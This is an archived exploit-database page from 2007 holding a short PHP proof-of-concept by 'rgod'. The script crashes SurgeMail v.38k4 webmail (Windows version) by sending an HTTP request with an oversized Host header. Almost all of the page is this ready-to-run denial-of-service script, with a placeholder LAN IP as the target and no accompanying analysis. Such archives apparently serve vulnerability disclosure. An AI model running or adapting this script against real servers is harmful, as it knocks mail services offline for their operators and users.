Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18669
HistoryDec 18, 2007 - 12:00 a.m.

SurgeMail v.38k4 webmail Host header crash

2007-12-1800:00:00
vulners.com
41

<?php
/*
SurgeMail v.38k4 webmail Host header denial of service exploit
tested against the windows version

rgod
*/

dl("php_curl.so");
$url = "http://192.168.0.1";
$puf=str_repeat(0xff,0xfff);

    $header =&quot;POST / HTTP/1.0&#92;r&#92;n&quot;;
    $header.=&quot;Host: $puf&#92;r&#92;n&quot;;
    $header.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
  
    $ch = curl_init&#40;&#41;;
    curl_setopt&#40;$ch, CURLOPT_URL,$url&#41;;
    curl_setopt&#40;$ch, CURLOPT_RETURNTRANSFER, 1&#41;;
    curl_setopt&#40;$ch, CURLOPT_TIMEOUT, 0&#41;;
    curl_setopt&#40;$ch, CURLOPT_CUSTOMREQUEST, $header&#41;;

    $data = curl_exec&#40;$ch&#41;; if &#40;curl_errno&#40;$ch&#41;&#41; {
       print curl_error&#40;$ch&#41;.&quot;&#92;n&quot;;
    } else {
       curl_close&#40;$ch&#41;;
    }

?>

original url: http://retrogod.altervista.org/rgod_surgemail_crash.html